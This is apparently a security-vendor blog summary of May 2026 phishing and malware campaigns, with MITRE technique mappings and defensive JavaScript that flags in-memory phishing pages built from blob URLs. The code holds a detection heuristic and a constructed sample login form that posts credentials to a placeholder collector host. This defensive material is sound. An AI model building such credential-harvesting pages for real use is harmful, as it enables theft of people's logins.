Major Cyber Attacks in May 2026: Fake Invitations, Agent Tesla, BlobPhish, and More

May 2026 campaigns showed attackers hiding phishing, credential theft, OTP interception, fileless execution, and remote access abuse inside routine business workflows to delay detection and increase business exposure.

Key points

  • ANY.RUN observed multiple May 2026 attack campaigns that blended into normal business activity to evade detection.
  • Fake invitation phishing targeted U.S. organizations and could lead to credential theft, OTP interception, and remote access tool delivery.
  • An Agent Tesla campaign used business-document lures against Latin American enterprises, putting finance, procurement, and payroll credentials at risk.
  • Compromised B2B websites were abused to deliver fileless malware through injected scripts, PowerShell, in-memory payloads, and C2 communication.
  • A large OTP phishing campaign impersonated a U.S. financial institution and reused hundreds of related phishing domains.
  • Fake Word Online / OneDrive pages redirected users into a ScreenConnect-based remote access chain disguised as document access.
  • BlobPhish used browser-generated blob objects to hide Microsoft 365 and webmail credential theft from traditional visibility controls.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – Used fake invitation flows, banking portals, and document lures to send victims to credential-harvesting pages [‘users followed an invitation that felt familiar’; ‘redirected users to a fake Word Online / OneDrive-style page’]
  • [T1056.003] Input Capture: Web Portal Capture – Collected usernames, passwords, OTP codes, and verification data through phishing pages [‘collect usernames, passwords, OTP codes, and email verification data’]
  • [T1556.004] Modify Authentication Process: Multi-Factor Authentication Interception – Intercepted OTPs in real time to bypass MFA protection [‘credential theft, OTP interception’]
  • [T1105] Ingress Tool Transfer – Delivered remote access tools and installers during phishing chains [‘possible remote access tool delivery’; ‘moved through software installation stages’]
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Used PowerShell execution as part of fileless delivery from compromised websites [‘move users toward PowerShell execution’]
  • [T1204.002] User Execution: Malicious File – Relied on users opening business-themed files such as invoices, purchase orders, and payroll documents [‘purchase orders, invoices, payroll files, and procurement requests’]
  • [T1218] System Binary Proxy Execution – Used legitimate-looking tools and workflows to run attacker activity while blending in with normal administration or support behavior [‘remote access through tools that may look similar to normal IT or support activity’]
  • [T1219] Remote Access Software – Deployed ScreenConnect and RMM-style access for hands-on control of victim systems [‘led to remote access through ScreenConnect’; ‘RMM deployment’]
  • [T1027] Obfuscated Files or Information – Hid malicious activity with blob-generated pages, in-memory payloads, and concealment activity [‘generated the page directly inside the browser using blob objects’; ‘kept the malicious content in memory’]
  • [T1055] Process Injection – Mentioned as part of fileless activity where malicious code may run in memory with fewer visible artifacts [‘process injection’]
  • [T1102.001] Web Service: Dead Drop Resolver – Used legitimate or compromised web infrastructure to stage malicious content and redirect victims [‘compromised websites and injected scripts’]
  • [T1071.001] Application Layer Protocol: Web Protocols – Enabled outbound command-and-control communication over web traffic [‘outbound C2 communication’]
  • [T1078] Valid Accounts – Stolen email, browser, banking, and session data could be reused for unauthorized access [‘stolen email, browser, banking, and session data can open the door to BEC, fraud, SaaS compromise’]
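
The BlobPhish technique noted above (a login page assembled in memory and opened from a blob: URL rather than fetched from a host) can be instrumented from the defender's side. The following is an added example, not code from ANY.RUN or from the write-up; it assumes the hook is injected into the page's main world by a browser extension before page scripts run, and it uses Node 18+ globals (Blob, URL.createObjectURL) so it can be exercised offline. The byte threshold and the sample page are constructed.

```javascript
// Added example (not from the ANY.RUN write-up): defensive instrumentation for the
// BlobPhish pattern, where the login page is assembled in memory and opened from a
// blob: URL instead of being fetched from a host. Assumption: in production this is
// injected into the page's main world by an extension before page scripts execute;
// here it runs in Node 18+ (Blob and URL.createObjectURL are global) for offline testing.

const HTML_TYPES = ['text/html', 'application/xhtml+xml'];
const MIN_HTML_BYTES = 256; // constructed threshold: skips tiny blobs such as download stubs

// Wrap URL.createObjectURL so every HTML blob minted into a blob: URL is recorded.
function installBlobMonitor(target = URL, report = () => {}) {
  const original = target.createObjectURL.bind(target);
  const events = [];
  target.createObjectURL = function (obj) {
    const url = original(obj);
    const type = (obj && typeof obj.type === 'string' ? obj.type : '')
      .split(';')[0].trim().toLowerCase();
    if (HTML_TYPES.includes(type) && obj.size >= MIN_HTML_BYTES) {
      const event = { url, type, size: obj.size, at: new Date().toISOString() };
      events.push(event);
      report(event);
    }
    return url;
  };
  return { events, uninstall: () => { target.createObjectURL = original; } };
}

// Heuristic over the blob's HTML: a credential form that submits somewhere off-page.
function looksLikeCredentialForm(html) {
  const lower = html.toLowerCase();
  const hasPassword = /<input[^>]*type\s*=\s*["']?password/.test(lower);
  const hasForm = /<form\b/.test(lower);
  const sendsElsewhere =
    /<form[^>]*action\s*=\s*["']?https?:\/\//.test(lower) || /\bfetch\s*\(|xmlhttprequest/.test(lower);
  return hasPassword && hasForm && sendsElsewhere;
}

// Constructed sample of what such an in-memory page might contain (not a real capture).
const SAMPLE_BLOB_HTML = `<!doctype html><html><head><title>Sign in</title></head><body>
<form action="https://collector.example.invalid/submit" method="post">
  <input type="email" name="login"><input type="password" name="passwd"><button>Next</button>
</form><!-- filler so the constructed sample exceeds MIN_HTML_BYTES: ${'x'.repeat(300)} -->
</body></html>`;

// Stand-alone demo: mint the sample as a blob: URL and show that it is flagged.
const demo = installBlobMonitor(URL, (e) => console.log('HTML blob URL minted:', e));
const demoUrl = URL.createObjectURL(new Blob([SAMPLE_BLOB_HTML], { type: 'text/html' }));
console.log('credential form?', looksLikeCredentialForm(SAMPLE_BLOB_HTML)); // true
URL.revokeObjectURL(demoUrl);
demo.uninstall();
```

Each recorded event pairs a blob: URL with the size and type of the HTML behind it, which is the visibility a proxy or URL-filtering control never gets for a page that was never fetched.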

Indicators of Compromise

  • [File names] Business-themed lures used to trick employees – purchase orders, invoices, payroll files, and procurement requests
  • [Domain names] Large OTP phishing infrastructure with reusable templates – hundreds of related phishing domains
  • [URLs / web pages] Fake login and document portals used in campaigns – fake invitation pages, fake Word Online / OneDrive-style page, banking portals
  • [Tools / software] Remote access and endpoint tooling seen in attack chains – ScreenConnect, RMM tools
  • [Malware families] Named malware observed in the campaigns – Agent Tesla, BlobPhish

Read more: https://any.run/cybersecurity-blog/major-cyber-attacks-may-2026/